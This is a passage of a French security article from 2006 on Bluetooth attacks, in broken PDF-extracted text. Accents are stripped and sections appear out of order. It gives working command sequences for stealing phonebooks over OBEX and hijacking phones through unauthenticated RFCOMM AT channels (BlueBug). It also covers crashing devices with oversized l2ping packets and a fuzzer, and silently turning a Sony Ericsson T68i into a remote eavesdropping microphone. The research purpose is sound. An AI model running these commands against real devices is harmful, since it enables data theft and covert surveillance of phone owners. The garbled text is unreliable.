(In)sécurité du Bluetooth
Contents
1. Atten tion cependant les valeurs des classes varient selon les constructeurs pour des types de p riph riques pourtant quivalents La quasi int gralit des routines de bas niveau relatives la s curit est directement impl men t e dans le chipset Bluetooth de fa on mat rielle L interface avec l OS s effectue via le protocole HCI cf ci dessous Il existe 3 modes de s curit Bluetooth Mode 1 Pas de m canisme de s curit Ce mode peut tre compar un hotspot public 802 11 par exemple Mode 2 S curit assur e au niveau applicatif Mode 3 S curit assur e au niveau liaison de donn es 2 1 HCI Le protocole Bluetooth peut se d composer en sous couches li es les unes aux autres les attaques distantes peuvent donc s op rer diff rents niveaux L abstraction mat rielle est assur e par HCI Host Controller Interface il s agit de l interface entre l OS et le firmware Bluetooth Celui ci g re diff rentes op rations basiques dont la d couverte des quipements distants hcidump HCI sniffer Bluetooth packet analyzer ver 1 28 device hci snap_len 1028 filter Oxffffffff lt HCI Command Inquiry 0x01 0x0001 plen 5 gt HCI Event Command Status OxOf plen 4 gt HCI Event Inquiry Result 0x02 plen 15 In s curit du Bluetooth Pierre BETOUIN 2 2 L2CAP 4 FIG 2 Principaux protocoles Bluetooth gt HCI Event Inquiry Result2. 3 Principaux protocoles Bluetooth 4 D tection de p riph riques avec btscanner 8 Oreillette Bluetooth ec 4 a 44 48 dia 44 gode dde da 9 Crash de la pile Bluetooth du Nokia N70 13 Utilisation d un TOSI en gege gt si La eu gd due gas nas dd pi 18 oO On D In s curit du Bluetooth Pierre BETOUIN
3. En revanche certaines impl mentations notamment sur des t l phones et PDA n cessitent que le service soit enregistr sur le serveur SDP pour y acc der Les Livebores Wanadoo supportant le Bluetooth par exemple utilisent une pile modifi e qui ne d clare aucun service ceux ci sont pourtant accessibles directe ment In s curit du Bluetooth Pierre BETOUIN 2 4 RFCOMM 5 sdptool browse 00 03 C9 YY VV YY Browsing 00 03 C9 VY YY YY psm_scan 00 03 C9 YY YY VY psm 0x0001 status L2CAP_CS_NO_INFO result L2CAP_CR_SUCCESS psm 0x0003 status L2CAP_CS_NO_INFO result L2CAP_CR_SUCCESS psm 0x0007 status L2CAP_CS_NO_INFO result L2CAP_CR_SUCCESS psm O0x000f status L2CAP_CS_NO_INFO result L2CAP_CR_SUCCESS Voici ci dessous un enregistrement SDP de service Dial Up Networking sur un t l phone mobile Service Name Dial Up Networking Service RecHandle 0x1000f Service Class ID List Dialup Networking Ox1103 Protocol Descriptor List L2CAP 0x0100 RFCOMM 0x0003 Channel 3 Language Base Attr List code_IS0639 0x454e encoding 0Ox6a base_offset 0x100 Profile Descriptor List Dialup Networking Ox1103 Version 0x0100 Le service est disponible au niveau L2CAP sur le PSM 3 et sur le port RFCOMM 3 cf chapitre 2 4 2 4 RFCOMM Le protocole RFCOMM permet d effectuer des communications de type RS232 s rie sur L2CAP en Bluetooth Les t l phones mobiles par exemple permettent un acc
4. s RFCOMM au travers de commandes AT AT ATZ ATDT et autres Les oreillettes Bluetooth peuvent ga lement utiliser RFCOMM via un service Handfree Audio Gateway par exemple De nombreux quipements communiquent via RFCOMM selon l impl mentation de la pile Bluetooth et le port RFCOMM une authentification de type pairing peut et devrait tre requise 2 5 OBEX OBEX OBject EXchange est un protocole d change d objets comme son nom l indique tels que des entr es de calendriers de carnets d adresses ou encore de simples fichiers Il est donc possible d envoyer commande PUSH ou de recevoir commande PULL des donn es depuis un terminal Bluetooth Comme le montre la figure 2 OBEX fonctionne au dessus de RFCOMM Le port utilis est en g n ral indiqu dans l enregistrement du serveur SDP Service Name OBEX Object Push Service RecHandle 0x10000 Service Class ID List OBEX Object Push 0x1105 Protocol Descriptor List L2CAP 0x0100 RFCOMM 0x0003 Channel 5 In s curit du Bluetooth Pierre BETOUIN Utilitaires 6 OBEX Ox0008 Cisa 3 Utilitaires 3 1 hcitool La recherche de p riph riques s effectue via une commande de type inquiry Les p riph riques contact s doivent tre joignables et d tectables mode discoverable Il est possible comme nous le verrons ci dessous d identifier par bruteforce ceux qui sont en mode cach hcitool inq Inquiring 00 15 AO0 XX
5. te encore parait il la majorit des internautes activer le Bluetooth sur un p riph rique vuln rable rel ve de la na vet La prochaine fois que vous irez boire un caf dans un lieu fr quent regardez autour de vous mais surtout d sactivez votre Bluetooth In s curit du Bluetooth Pierre BETOUIN R F RENCES 21 R f rences Ben05 BENHUI Bluetooth device browser 2005 http www benhui net BET06a BETOUIN PIERRE Bluetooth stack smasher 2006 http securitech homeunix org blue BETO06b BETOUIN PIERRE Bluez hcidump denial of service 2006 http article gmane org gmane linux bluez devel1 6901 BETO6c BETOUIN PIERRE Sony ericsson k600i reset display exploit 2006 http securitech homeunix org blue reset_display_sonyericsson c Bun06 BUNKER THE Bluetooth security presentation 2006 http www thebunker net security bluetooth htm DAVO5 DAVIS JosHUA T bear transient bluetooth environment auditor 2005 http wuww transient iss com software html Fro06 FRONTLINE Bluetooth baseband sniffer devices 2006 http www fte com HURO06 HURMAN Tim Bluetooth device scanner 2006 http www pentest co uk cgi bin viewcat cgi cat downloads Imm06 IMMUNITY Spike 2006 http www immunitysec com MUL06 MULLINER CoLLIN Bluetooth auditing tool 2006 http www betaversion net btdsd Nok04 No
6. GPS routeurs imprimantes appareils photos etc Il fonctionne dans la gamme des 2 4GHz tout comme son homologue 802 11 Il existe 79 canaux Bluetooth d une lar geur de bande d 1MHz chacun Jusqu r cemment Bluetooth ne faisait pas l objet d inqui tudes particuli res concernant les menaces li es la s curit de ses quipements notamment en raison de sa faible port e quelques dizaines de m tres sur les quipements normaux De plus grandes distances ont depuis pu tre atteintes cf Tri06b Long Distance Snarf avec des quipements appropri s antennes direc tionnelles etc Les technologies employ es pour augmenter les distances de communication sont tr s proches de celles utilis es en 802 11 en raison de leurs gammes de fr quences quivalentes Il suffit de se rendre dans un lieu relativement fr quent gares cin mas a roports etc avec un scanner Bluetooth pour comprendre l ampleur des risques encourus d avoir un quipement Bluetooth activ dans sa poche Les cons quences de la compromission d un cellulaire ou d un assistant personnel peuvent se r v ler critiques allant du simple d ni de service la r cup ration du carnet d adresses de la consultation des derniers appels mis re us de la lecture des SMS ou l tablissement enti rement transparent pour la victime d un appel ou d une connexion Internet Les premi res sp cifications ont t d velopp es par
7. In s curit du Bluetooth DE NOUVELLES MENACES Pierre BETOUIN lt pierre betouin security labs org gt 3 f vrier 2006 Table des mati res AA BlueStumbling 9 A5 BlieBug 9 1 Introduction 2 dp Helomoto s oa 44244 10 AT Bli Smack ue ue 10 PR 3 48 Outils Symbian 11 21 HOD sec sde e Ar A 3 D DICAP ss Nude Et 4 5 Attaques sur les impl mentations 11 A DEP ao si rome 4 5 1 Pourquoi d sactiver le Bluetooth 11 24 RFCOMM 5 5 2 Pr sentation de l outil BSS AO OBEX o ay oaa ie A E 5 Bluetooth Stack Smasher 11 5 3 P riph riques audit s et r sultats 12 3 Utilitaires 6 5 3 1 T l phones mobiles 12 SL eben 2 SE Le a 6 532 PDA ue due vu 14 32 ping 6 5 3 3 Liveboxes Wanadoo 14 33 sdptool 6 5 3 4 Effets de bord 15 34 rfcomm 7 5 4 Nouvelles voies explorer 16 35 BEUN o sui pub 7 6 Sc narios 16 4 Attaques g n riques 8 6 1 T l phone micro 16 4 1 D tection de p riph riques 8 6 2 D tournement de trafic WiFi 18 4 2 Processus de pairing 8 4 3 BlueSnarfing 9 7 Conclusion 20 Introduction 2 1 Introduction Bluetooth est un protocole de communication sans fil courtes distances qui a t largement d ploy depuis plusieurs ann es dans de nombreux types de p riph riques t l phones mobiles ordinateurs portables
8. bss c a d tre modifi e A 0 BSS effectue un scan en boucle infinie sans se soucier des r actions du t l phone hcitool scan Scanning 00 12 47 UU UU UU Samsung E730 bss s 15 m 12 00 12 47 UU UU UU snip bss s 15 m 12 00 12 47 UU UU UU connect host is down hcitool scan Scanning 5 3 2 PDA En raison d un manque de mat riel pour effectuer ces tests sur des PDA Palm PocketPC etc il m a t impossible de faire des comparatifs valables En revanche certains vieux iPaqs sont vuln rables des paquets de grandes tailles attaque bluesmack BSS de part son fonctionnement rel ve ce type d erreurs tr s rapidement 5 3 3 Liveboxes Wanadoo Les Liveboxes Wanadoo supportent d sormais par d faut la technologie Bluetooth Seul le mod le Inventel a t test ici Encore une fois il a t impossible d isoler avec pr cision le ou les bug s responsable s des comportements anormaux mais ceux ci sont en g n ral reproductibles en moins de 10 minutes avec BSS 2 comportements diff rents ont pu tre identifi s Crash de la pile Bluetooth seule sans cons quence sur le fonctionnement 802 11 du routeur sans fil Les services Bluetooth sont alors inaccessibles mais le point d acc s 802 11 continue de fonctionner normalement In s curit du Bluetooth Pierre BETOUIN 5 3 P riph riques audit s et r sultats 15 Crash de la pile Bluetooth et de l en
9. me si cela ne constitue pas en soi un d faut de s curit majeur D autres attaques passives ou actives concernant le processus de pairing existent notamment des attaques permettant de casser un PIN avec une coute passive d association entre 2 p riph riques cf VS05 Nous ne d taillerons pas cette derni re attaque qui rel ve plus de la cryptologie que de notre tude Il n existe pas encore l heure actuelle de proof of concept public 4 3 BlueSnarfing Cette attaque est la premi re d couverte dans ce domaine Le BlueSnarf consiste se connecter au service OBEX Push Les quipements vuln rables ne requi rent en effet aucune authentification Des fichiers dont les noms doivent tre connus peuvent ensuite tre r cup r s silencieuse ment via une commande GET Le BlueSnarfing est similaire en tous points au BlueSnarfing mais se connecte un serveur OBEXFtp disponible sur le p riph rique distant permettant ainsi un acc s complet au syst me de fichier distant Nul besoin alors de sp cifier le nom exact d un fichier r cup rer une navigation interactive est alors possible La r cup ration d un carnet d adresse s effectue simplement avec Tout obexftp ici via le canal RFCOMM 10 obexftp b XX XX XX XX XX XX B 10 g telecom pb vcf 4 4 BlueStumbling Il s agit encore ici d une erreur d impl mentation de nombreux t l phones sont encore ac tuellement vuln
10. rables une liste est disponible sur Bun06 Cette attaque consiste r cup rer des informations calendrier carnet d adresses fichier IMEI etc via le protocole OBEX com mande PULL Toutes sortes d informations sont disponibles selon l OS distant Symbian par exemple stocke l int gralit des donn es y compris les credentials mots de passe en clair Une configuration de compte POP typiquement 4 5 BlueBug Le BlueBug est s rement la faille pouvant se r v ler la plus lourde de cons quences pour une victime Elle consiste se connecter sur un port RFCOMM ne n cessitant aucune authentification pas de pairing permettant l acc s un set de commandes AT Ces commandes permettent un contr le quasi int gral au t l phone ses param tres sa configuration etc De nombreux sc narios peuvent tre imagin s La simplicit de cette attaque est redoutable face aux cons quences qu elle peut avoir factures de t l phone astronomiques compromission de donn es sensibles etc Il suffit de sniffer rapidement les quipements pr sents dans un lieu public pour se rendre compte In s curit du Bluetooth Pierre BETOUIN 4 6 Helomoto 10 de son r alisme et de la simplicit de sa mise de en oeuvre La figure 1 en atteste en moins de 5 minutes un premier T610 vuln rable cette attaque tait d j d tect suivi de nombreux Nokia 6310 Connexion sur le canal RFCOMM 17 rfcomm bind 0 0
11. reprise de l outil DAVO05 permettant d exploiter des vuln rabi lit s de type BlueSmack Il utilise la libbluetooth et est pour l instant disponible uniquement sous Linux Les structures sont notamment disponibles dans usr include bluetooth bluetooth h hci h 12cap h et rfcomm h BSS peut tre lanc en sp cifiant un mode sp cifique les paquets seront alors semi al atoires ou en forgeant l ensemble des trames L2CAP al atoirement les 11 commandes prin cipales L2CAP_COMMAND_REJ L2CAP_CONN_REQ L2CAP_ECHO_REQ etc sont sup port es D autres types de tests sont en cours de d veloppement pour les prochaines versions de BSS La derni re version de BSS est disponible sur BET06a bss s 200 m 12 00 80 37 ZZ ZZ ZZ Le fuzzer enverra ici des paquets L2CAP enti rements al atoires tailles et contenus d une taille maxiumum de 200 octets fix e par le param tre s 5 3 P riph riques audit s et r sultats La base de donn es Bluetooth device security database cr e par Collin Mulliner cf MUL06 contient des informations relatives la s curit de plusieurs p riph riques Il s agit pour l ins tant principalement de t l phones mobiles Elle est aliment e par les sorties de l outil bt audit L id e d un fuzzer Bluetooth est de parvenir d tecter un maximum de bugs l aveugle sans informations pr alables codes sources reverse engineering etc Les quipements Bluet
12. 0 80 37 ZZ ZZ ZZ 17 Communication s rie cu l dev rfcommO connected gt ATI OK ctrl c rfcomm release 0 Le sc nario d crit plus bas cf chapitre 6 1 pr sente la compromission d un t l phone Sony Ericsson T68i le transformant en microphone de poche l insu de son propri taire L outil rfcomm _ scan de la suite bt_audit MUL06 permet de d tecter rapidement les quipe ments vuln rables cette attaques rfcomm_scan o s 1 e 4 XX XX XX XX XX XX rfcomm 01 open rfcomm 02 open rfcomm 03 open rfcomm 04 open Il est possible de r cup rer le carnet d adresses avec les commandes AT btzml cf OBE04 permet d automatiser ces commandes et propose une sortie XML du carnet d adresses distant Le canal RFCOMM 17 est utilis par d faut bacpy amp req src BDADDR_ANY bacpy amp req dst bdaddr req channel 17 Les sp cifications techniques des commandes AT Nokia sont disponibles sur Nok04 et sur Son05 pour les mod les Sony Ericsson 4 6 Helomoto Comme son nom l indique ironiquement Helomoto est une attaque visant les t l phones mobiles Motorola Elle consiste initier l envoi d un objet OBEX la fa on du BlueJacking Celui ci volontairement interrompu permet de placer l attaquant dans la liste des p riph riques de confiance Une fois ajout l attaquant peut se connecter en RFCOMM BlueBug sur le service RFCOMM Headset de l appareil sans authentifi
13. 0x02 plen 15 gt HCI Event Inquiry Complete 0x01 plen 1 2 2 L2CAP L2CAP est l quivalent d un protocole d acc s au m dia propre au Bluetooth permettant de multiplexer des protocoles de couches sup rieures RFCOMM par exemple et de g rer les contraintes telles que la fragmentation des paquets et le r assemblement Il fonctionne via des canaux appel s PSM Protocol Service Multiplexer qui se chargent de rediriger les requ tes vers les protocoles des couches sup rieures Le protocole RFCOMM de type liaison s rie Bluetooth utilise par exemple le PSM 3 tandis que SDP Service Discovery Protocol utilise le PSM 1 Les PSM sont comparables par analogie des ports TCP UDP D autres PSM non document s sont disponibles sur certains quipements Il est alors typiquement difficile pour un utilisateur de s assurer qu il ne s agit pas d une porte d rob e ou d un service de d buguage L outil psm scan cf MUL06 permet de lister les PSM accessibles Un grand nombre d entre eux est galement r pertori sur la base de donn es MUL06 2 3 SDP SDP Service Discovery Protocol permet de lister les services disponibles sur un p riph rique ainsi que diff rentes informations relatives PSM Ports RFCOMM description des services en codage etc Il s agit uniquement d informations il est tout fait possible d utiliser un service sans que celui ci soit pour autant repertori par le serveur SDP distant
14. Ericsson Le SIG Special Interest Group compos entre autres d Ericsson IBM Intel Microsoft Motorola Nokia ou Toshiba a pris le re lais en 1999 Les sp cifications techniques sont disponibles sur http www bluetooth org Si le protocole en lui m me est relativement bien pens les nombreuses impl mentations elles le sont beaucoup moins leur nombre important entra ne ind niablement de nombreux soucis concernant la s curit Il est d ailleurs possible de retrouver des bugs quivalents pour des impl mentations diff rentes Les enseignements du pass n ont malheureusement toujours pas servi de le on Un p riph rique Bluetooth ma tre peut communiquer avec 7 autres p riph riques esclaves au maximum Le r seau ainsi cr e s appelle un Piconet Un Scatternet quant lui consiste en une interconnexion de r seaux de type Piconet gr ce des p riph riques jouant le r le de routeurs Le nombre de Piconets est limit 10 dans un Scatternet In s curit du Bluetooth Pierre BETOUIN Bluetooth 3 Fo 1 D couverte d quipements Bluetooth sur Symbian 2 Bluetooth Un quipement Bluetooth est caract ris principalement par Son adresse BT BD _ADDR similaire une adresse MAC les 3 premiers octets sont ceux d finis par le constructeur suivis de 3 octets propres l quipement Sa classe propre au type de p riph rique oreillette Bluetooth t l phone mobile
15. XX XX clock offset 0x4b4e class 0x50020c 00 03 C9 YY YY YY clock offset 0Ox7e8d class 0x520310 Ici 2 p riph riques sont d tect s respectivement un t l phone mobile Nokia N70 et une Li vebox Wanadoo Nous pourrions croire qu il existe une relation entre les requ tes de d couverte inquiry et le protocole SDP mais il n en n est rien cf sortie d hcidump ci dessus Ce processus est g r de fa on mat rielle par le chipset Bluetooth de l quipement il s agit de requ tes interfac es via le protocole HCI 3 2 l2ping l2ping permet d envoyer un p riph rique des paquets de niveau L2CAP de type ECHO RE QUEST la mani re d un ping ICMP La taille des paquets leur nombre ainsi que l adresse Bluetooth source peuvent tre sp cifi s Certaines impl mentations des piles ne r pondent volon tairement pas ces requ tes C est le cas de nombreuses oreillettes Bluetooth par exemple l2ping c 3 00 15 A0 XX XX XX Ping 00 15 A0 XX XX XX from 00 20 E0 75 83 DA data size 44 O bytes from 00 15 A0 XX XX XX id O time 64 18ms O bytes from 00 15 A0 XX XX XX id 1 time 43 94ms O bytes from 00 15 A0 XX XX XX id 2 time 37 25ms 3 sent 3 received 0 loss 3 3 sdptool sdptool permet d effectuer diff rentes op rations au niveau L2CAP des requ tes directes vers les p riph riques distants mais galement la configuration du serveur sdpd ajout suppression de services par exemple sur la machine lo
16. ar le groupe Trifinite permet de tester diff rentes at taques BlueBug BlueSnarf BlueSnarf BlueSmack etc Il se r v le tr s pratique dans le cadre de tests d intrusion permettant d tablir un premier diagnostic rapide Certaines piles sont cependant incompatibles entre elles BTBrowser cf Ben05 permet de lister les p riph riques disponibles ainsi que les services qui leur sont associ s via des requ tes SDP 5 Attaques sur les impl mentations 5 1 Pourquoi d sactiver le Bluetooth Les attaques connues sont pour la plupart dues des probl mes d impl mentations il s agit de bugs logiciels et non de bugs intrins ques aux diff rents protocoles Bluetooth Presque tous les constructeurs sont concern s par ces failles Les nombreuses publications et pr sentations r centes li es la s curit de ces protocoles ont permis de sensibiliser les utilisateurs aux risques encourus contraignant de ce fait les constructeurs plus de s rieux dans le d veloppement et l int gration du Bluetooth Les erreurs commises par ces derniers sont extr mement graves pour les utilisateurs La forte concurrence du secteur des t l communications est sans conteste un des facteurs qui les a conduits commettre ces nombreuses erreurs La n cessit de sortir rapidement de nouveaux mod les avec de nouvelles fonctionnalit s non ma tris es y compris par les d veloppeurs est l origine de ces n gligences Les tendanc
17. cale afin de r pondre aux requ tes SDP entrantes sdptool options lt command gt command parameters Options h Display help i Specify source interface Commands search Search for a service browse Browse all available services records Request all records add Add local service del Delete local service get Get local service In s curit du Bluetooth Pierre BETOUIN 3 4 rfcomm 7 setattr Set Add attribute to a SDP record setseq Set Add attribute sequence to a SDP record Services DID SP DUN LAN FAX OPUSH FTP HS HF SAP NAP ON PANU HID CIP CTP A2SRC A2SNK SYNCML NOKID PCSUITE SR1 La commande sdptool browse 00 15 A0 XX XX XX permettra de lister les services dispo nibles sur le t l phone mobile Nokia N70 et ils peuvent parfois s av rer tr s nombreux La multiplication des services distants les rend videmment d autant plus vuln rables Les arguments add et del permettent d enregistrer de nouveaux services sur la machine locale L ajout d un serveur OBEX et de son enregistrement SDP correspondant s effectue avec sdptool add channel 10 OPUSH obexserver 3 4 rfcomm rfcomm permet d tablir une communication de type RFCOMM entre 2 p riph riques Le mo dule noyau rfcomm se chargera de cr er le lien dev rfcomm X vers le p riph rique si l argument bind est employ Commandes bind lt dev gt lt bdaddr gt channel Bind device release lt dev gt Release device show lt dev gt S
18. cation pr alable La suite est une attaque type BlueBug classique 4 7 BlueSmack BlueSmack est une attaque visant bloquer les p riph riques Bluetooth crash de la pile ou du syst me d exploitation distant via une requ te l2ping anormalement longue ou via de tr s nom breuses requ tes flood ping Une description plus d taill e de l attaque est disponible sur Tri05b les PDA Dao plantent avec des pings L2CAP d une taille sup rieure 600 octets In s curit du Bluetooth Pierre BETOUIN 48 Outils Symbian 11 Certains quipements limitent la taille des trames L2CAP re ues r duisant ainsi les risques de congestion au niveau de leurs files d attente l2ping c 1 s 247 00 80 37 ZZ ZZ ZZ Ping 00 80 37 ZZ ZZ ZZ from 00 20 E0 75 83 DA data size 247 O bytes from 00 80 37 ZZ ZZ ZZ id O time 60 86ms 1 sent 1 received 0 loss l2ping c 1 s 248 00 80 37 ZZ ZZ ZZ Ping 00 80 37 ZZ ZZ ZZ from 00 20 E0 75 83 DA data size 248 no response from 00 80 37 ZZ ZZ ZZ id 0 1 sent O received 100 loss Il neiste pas de norme pour le MTU Max Transmission Unit des paquets L2CAP Des trames forg es semi al atoires peuvent cependant conduire un d ni de service cf chapitre 5 4 8 Outils Symbian Des outils permettant d valuer la s curit de p riph riques Bluetooth existent pour DOS em barqu Symbian pr sent sur de nombreux t l phones mobiles Blooover II cf Tri05a d velopp p
19. clusion 20 7 Conclusion Les protocoles utilis s dans la technologie Bluetooth ont t d velopp s en prenant en compte des probl matiques li es la s curit Les probl mes r sident en grande partie dans les impl men tations qui en ont t faites Des bugs tels que le BlueBug ne doivent plus tre accept s par les utilisateurs l erreur est tellement grave que nous pouvons m me nous interroger s agit il r ellement d une erreur Des traps cryptographiques ou des backdoors ont d j t r vel es il est normal de douter En fonction du contexte d utilisation du p riph rique et du niveau de s curit requis il peut tre n cessaire de d sactiver le Bluetooth sur le p riph rique Si seulement 40 des utilisateurs de t l phones mobiles consid rent que les informations stock es sur leurs terminaux sont confiden tielles la totalit d entre eux se soucie du montant de leur facture en fin de mois La recherche en s curit sur ces technologies est relativement r cente mais les attaques sont d j nombreuses et touchent d j une grande partie des p riph riques La forte instabilit des piles Bluetooth engendrera ind niablement de nouvelles attaques mais gageons que les construc teurs se montreront plus soucieux de la s curit de leurs clients et soigneront leurs d veloppements Contrairement ce que pensent de nombreuses personnes la menace est bien r elle si acheter sur Internet inqui
20. eau en les rejouant uniquement apr s avoir relanc lappliance bien s r 5 3 4 Effets de bord Un bug de type DoS a pu tre identifi cf BET06b dans l outil hcidump de Bluez pendant les tests men s sur les mod les Sony Ericsson K600i V600i W800i etc Il se situe dans le code du parser L2CAP parser 12cap c while frm gt len gt L2CAP_CMD_HDR_SIZE if p_filter FILT_L2CAP p_indent level frm printf L2CAP s switch hdr gt code 12cap_cmd_hdr hdr frm gt ptr frm gt ptr L2CAP_CMD_HDR_SIZE frm gt len L2CAP_CMD_HDR_SIZE In s curit du Bluetooth Pierre BETOUIN 5 4 Nouvelles voies explorer 16 Case default if p_filter FILT_L2CAP break printf code 0x 2 2x ident jd len d n hdr gt code hdr gt ident btohs hdr gt len raw_dump level frm D frm gt ptr btohs hdr gt len frm gt len btohs hdr gt len D Le code du d ni de service est disponible sur BET06a 5 4 Nouvelles voies explorer Il serait int ressant de simuler un serveur sdpd bugu et d analyser le comportement des p ri ph riques qui le contactent Des floods RFCOMM peuvent galement tre int ressants Une analyse des services L2CAP non document s pourrait s rement mener de nouveaux sc narios des PSM sont ouverts sur la majorit des quipements Une analyse plus en profondeur des piles Bluetooth pourrait galement tre effectu e en dum
21. ent contenant le nom Bluetooth du p riph rique tentant d tablir la connexion BlueEvil tente de se connecter votre p riph rique voulez vous accepter la connexion Aucune demande il s agit bien souvent de PIN Bluetooth pr d finis par les constructeurs En effet tous les p riph riques ne poss dent pas d cran et ou d interface de saisie celui ci est alors attribu par le constructeur Dans le meilleur des cas le constructeur g n re les PIN de fa on al atoire et le notifie sur le manuel d utilisation par exemple En revanche certains constructeurs continuent encore attribuer des PIN par d faut 1234 0000 etc il est donc facile pour un attaquant de se connecter sur le p riph rique distant Le multi pairing permet plusieurs terminaux de se connecter simultan ment sur un m me service Bien souvent le multi pairing est nocif la s curit de l quipement comme cela a pu tre d montr avec l outil carwhisperer cf Tri05c Il exploite 2 graves erreurs de certains mod les d oreillettes Bluetooth que sont le multi pairing et la d finition de PIN par d faut carwhisperer permet alors d couter le flux audio de fa on enti rement transparente et galement den injecter via le port RFCOMM concern In s curit du Bluetooth Pierre BETOUIN 43 BlueSnarfing 9 FIG 4 Oreillette Bluetooth Il est en effet bien souvent inutile d autoriser le multi pairing m
22. es actuelles du tout en un rendent d autant plus vuln rables les utilisateurs un appareil photo un PDA un t l phone mobile peuvent rapidement se transformer en v ritables trojans mobiles 5 2 Pr sentation de l outil BSS Bluetooth Stack Smasher BSS Bluetooth Stack Smasher est un outil d velopp initialement dans le cadre de cet article et dont le but est d effectuer diff rents tests sur les p riph riques Bluetooth BSS doit pouvoir effectuer ses tests de fa on enti rement transparente pour les p riph riques audit s aucune de mande de pairing Une analyse de code d sassemblage etc tant longue et parfois fastidieuse In s curit du Bluetooth Pierre BETOUIN 5 3 P riph riques audit s et r sultats 12 mener sur des piles Bluetooth propri taires comme nous l avons vu pr c demment l id e de d ve lopper un fuzzer Bluetooth permet d effectuer de nombreux tests a l aveugle sans informations pr alables BSS effectue un fuzzing au niveau L2CAP permettant De tester la couche la plus basse et donc de recenser les bugs les plus g n riques De toucher tous les types d quipements De tester les quipements sans n cessiter d authentification un fuzzer fonctionnant au ni veau RFCOMM par exemple est r alisable mais alerterait aussit t l quipement consid r ici comme non vuln rable aux attaques du type BlueBug La base du code de BSS a t
23. how device connect lt dev gt lt bdaddr gt channel Connect device listen lt dev gt channel Listen La commande permettant de se connecteur au t l phone Nokia sur le canal 6 via dev rfcommO est rfcomm bind O 00 15 A0 XX XX XX 6 La d connexion est assur e avec rfcomm release 0 Les outils permettant de communiquer sur un lien RS232 sont nombreux citons notamment minicom ou cu cu 1 dev rfcommO Le p riph rique distant alertera l utilisateur qu une connexion entrante tente de s tablir lui laissant alors le choix de l accepter ou de la d cliner nous verrons que ce n est pas toujours le cas il s agit du processus de pairing cf chapitre 4 2 3 5 hcidump hcidump permet notamment aux d veloppeurs de suivre les envois et r ceptions de paquets partir du protocole HCI jusqu des protocoles de plus haut niveau Il est analogue bien que beaucoup moins volu un outil du type tcpdump sniffer r seau Cependant hcidump ne permet pas d couter le trafic ne concernant pas la machine locale car le trafic est filtr de fa on mat rielle par le chipset Bluetooth Une coute passive de trafic est cependant possible en utilisant des chipsets Bluetooth sp cifiques tels que Fro06 Un exemple de sortie de cet outil est disponible en 2 1 requ te de type inquiry In s curit du Bluetooth Pierre BETOUIN Attaques g n riques 8 4 Attaques g n riques 4 1 D tec
24. ieurs m thodes la plus simple tant l emission d un appel vers un num ro contr l cabine t l phonique etc Le social engineering pourrait galement tre utilis Pour largir le champ de l article notamment techni quement nous d taillerons le cas d un envoi de SMS vers un terminal contr l Les commandes AT changent sensiblement suivant les constructeurs et les mod les Voici 2 exemples d missions de SMS Depuis un Nokia N70 AT CMGS 33687XXXXXX Envoi du num ro distant OK Depuis un Sony Ericsson T68i utilisant un encodage particulier cf UD05 AT CMGS 27 00110004410687XXXXXX0000FF10C8329BFD065DDF72361904028140 In s curit du Bluetooth Pierre BETOUIN 6 2 D tournement de trafic WiFi 18 CMGS 83 Ok 00 52 L Pierre Beto GH Froe 6 Utilisation d un T68i en micro Comme le montre la figure 6 le T68i se tranforme alors en v ritable micro de poche HF un simple appel faisant alors office de d clencheur 6 2 D tournement de trafic WiFi Quel rapport entre des attaques Bluetooth et des attaques sur le protocole 802 11 premi re vue aucune mais de nombreuses appliances d sormais fournies par les fournisseurs d acc s Internet supportent en natif et par d faut des connexions Bluetooth Le nom Bluetooth de l quipement est en g n ral identique au nom du point d acc s 802 11 ESSID Le BSSID et l adresse Bluetooth sont galement parfois identique
25. kia At command set for nokia gsm and wcdma products 2004 http ncsp forum nokia com download asset_id 11579 ref devx OBE04 OBERRITTER ANDREAS Address book dumper 2004 http www betaversion net btdsd download btxml c RUF05 RUFF NICOLAS Rump session sstic 2005 2005 http actes sstic org SSTICO5 Rump_sessions SSTICO5 rump Ruff Bluesnarfing pdf Son05 SONY ERICSSON At command set for nokia gsm and wcdma products 2005 http developer sonyericsson com getDocument do docId 65054 Tri05a TRIFINITE Blooover software 2005 http trifinite org trifinite_ downloads html Tri05b TRIFINITE Bluesmack attack 2005 http trifinite org trifinite_stuff_ bluesmack html Tri05c TRIFINITE Carwhisperer 2005 http trifinite org trifinite_stuff_ carwhisperer html Tri06a TRIFINITE Bluetooth fingerprinting 2006 http trifinite org trifinite_ stuff_blueprinting html Tri06b TRIFINITE Groupe de recherche s curit bluetooth 2006 http www trifinite org UD05 USB DEVELOPERS Gsm page 2005 http www usbdeveloper com GSMPage gsnpage htm VS05 VANIV SHAKED AVISHAI WOOL Cracking the bluetooth pin 2005 http www eng tau ac il yash shaked wool mobisysO5 In s curit du Bluetooth Pierre BETOUIN TABLE DES FIGURES 22 Table des figures D couverte d quipements Bluetooth sur Symbian
26. ones alertant de fa on so nore d une tentative de connexion Bluetooth demande de pairing La plupart du temps l change de donn es Bluetooth est uniquement notifi par une mise en surbrillance de l icone associ e au protocole L attaque BlueBug est alors men e sur le port concern rfcomm_ scan s 1 e 17 00 80 37 ZZ ZZ ZZ rfcomm 01 closed rfcomm 02 closed rfcomm 03 closed rfcomm 04 closed In s curit du Bluetooth Pierre BETOUIN 6 1 T l phone micro 17 rfcomm 05 closed 52 rfcomm 17 open rfcomm bind O 00 80 37 ZZ ZZ ZZ 17 cu l dev rfcomm 0 connected Les commandes AT permettent ensuite d acc der au terminal lecture envoi de SMS carnet d adresses activation des modes mission d appels L attaquant cherchera conna tre quelques l ments de configuration du t l phone ATIS Configuration Settings on Channel Oo amp C 1 amp D 0 CGACT 1 0 CGACT 2 0 CGACT 3 0 CGACT 4 0 CGACT 10 0 CGATT 1 CGEREP 0 0 CGQMIN 1 0 CGQREQ 1 0 Gear S8 002 V 1 X 4 Ok Il activera le mode silencieux et pourra galement d sactiver le vibreur ainsi que la fonction d crochage automatique g n ralement utilis e avec les kits mains libres AT ESIL 1 Ok ATSO 1 Ok L tape suivante incoutournable pour le pirate sera la r cup ration du num ro de t l phone de la victime Selon son style et son besoin en furtivit il pourra user de plus
